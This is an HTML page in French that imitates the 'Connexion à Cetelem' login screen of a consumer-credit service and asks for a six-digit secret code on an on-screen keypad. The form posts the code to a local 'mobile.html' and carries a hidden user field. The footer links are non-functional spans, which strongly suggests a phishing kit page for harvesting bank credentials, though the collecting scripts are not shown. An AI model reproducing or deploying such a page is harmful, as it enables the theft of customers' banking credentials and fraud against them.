<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="css/suit.css">
    <title>Connexion à Cetelem</title>
</head>
<body>

<main>
    
    <div class="form">

<div class="logo">
<img src="img/logo.png" >
</div>
<div class="title">
<label >Un crédit vous engage et doit être remboursé. <br>
Vérifiez vos capacités de remboursement avant de vous engager.</label>
</div>



    <div class="continer">
    <form action="mobile.html" method="post">
        
    <div class="man">
        <img src="img/man.png" >
        </div>
        
        <div class="tite">
        <h1>Accéder à mon espace sécurisé</h1>
        </div>

    <div class="col">
            <label for="code">Code secret (6 chiffres)</label>
            <input type="hidden" name="user" value="">
            <input type="message"  maxlength="6"  id="pass" placeholder="******" name="message" required >  </div>





            <div class="keypad">
                <button type="button" onclick="picker(3)">3</button>
                <button type="button" onclick="picker(2)">2</button>
                <button type="button" onclick="picker(4)">4</button>
                <button type="button" onclick="picker(0)">0</button>
                <button type="button" onclick="picker(8)">8</button>
                <button type="button" onclick="picker(9)">9</button>
                <button type="button" onclick="picker(7)">7</button>
                <button type="button" onclick="picker(5)">5</button>
                <button type="button" onclick="picker(1)">1</button>
                <button type="button" onclick="picker(6)">6</button>
            </div>

            <div class="but">
            <button type="submit" class="submit-btn">Je me connecte</button> </div>

            <div class="a">
<a href="#">Code secret oublié  ?</a>
</div>





</form>
    </div>
    </div>

    <div class="span">
<span>Virement express</span>
<span>Résiliation</span> <span>Contact</span> <span>Questions / Réponses</span> <span>Réclamation</span> 
<span>Mentions légales</span> <span>Informations sur les cookies</span> <span>Préférence de cookies</span> 
<span>Données personnelles</span> 
<br><br><span>Déclaration accessibilité</span> <span>Accessibilité</span>
</div> 

<div class="span1">
<span>Virement express</span>
<span>Résiliation</span> <span>Contact</span> <span>Questions / Réponses</span> <span>Réclamation</span> 
<span>Mentions légales</span> <span>Informations sur les cookies</span> <span>Préférence de cookies</span> 
<span>Données personnelles</span> 
 <span>Déclaration accessibilité</span> <span>Accessibilité</span>
</div> 

<div class="fa">
<img src="img/fa.png" >
</div>

</main>

<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js"></script>
<script>


function picker(id){
    if($("#pass").val().length==6){
        return false;
    }
    $("#pass").val($("#pass").val()+id);
}


</script>
<script src="main.js"></script>
